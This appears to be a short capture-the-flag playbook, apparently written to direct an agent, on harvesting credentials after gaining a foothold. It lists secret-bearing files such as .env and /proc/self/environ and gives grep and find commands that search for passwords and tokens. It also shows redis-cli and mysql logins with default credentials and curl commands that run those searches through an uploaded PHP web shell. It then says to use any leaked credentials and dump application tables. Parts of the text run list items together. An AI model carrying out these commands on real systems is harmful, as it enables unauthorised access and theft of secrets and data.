Use when a foothold, file-read, source disclosure, Redis, database, session, or config leak may contain credentials or reusable secrets.
Use this whenever a foothold or file-read exists. The fastest next flag is often in config, sessions, cache, or database rows.
.env, config.php, settings.py, database.yml, application.properties, docker-compose.yml./proc/self/environ, session directories, upload directories, logs, backup files.SECRET_KEY, Django SECRET_KEY, JWT keys, signing salts, API tokens.grep -R --line-number -Ei 'password|passwd|secret|token|apikey|dsn|mysql|redis|flag\\{' /var/www 2>/dev/null | head -n 80
find / -maxdepth 4 -type f \\( -name '.env' -o -iname '*config*' -o -iname '*.sqlite*' -o -iname '*backup*' \\) 2>/dev/null
redis-cli -h HOST -a 'PASSWORD' --no-auth-warning keys '*'
mysql -h HOST -uroot -proot -e 'show databases;'
After a foothold on a PHP site:
curl -sG --data-urlencode 'cmd=grep -R -nEi "redis|mysql|password|secret|token" /var/www 2>/dev/null | head -n 50' \
http://target/uploads/shell.php
curl -sG --data-urlencode 'cmd=find /var/www -maxdepth 4 -type f \\( -name ".env" -o -iname "*config*" \\) 2>/dev/null' \
http://target/uploads/shell.php
If config reveals:
REDIS_PASSWORD=12345678DB_USER=rootDB_PASS=rootthen stop searching random files and immediately validate those services, dump app tables, and look for:
flag{...} immediately.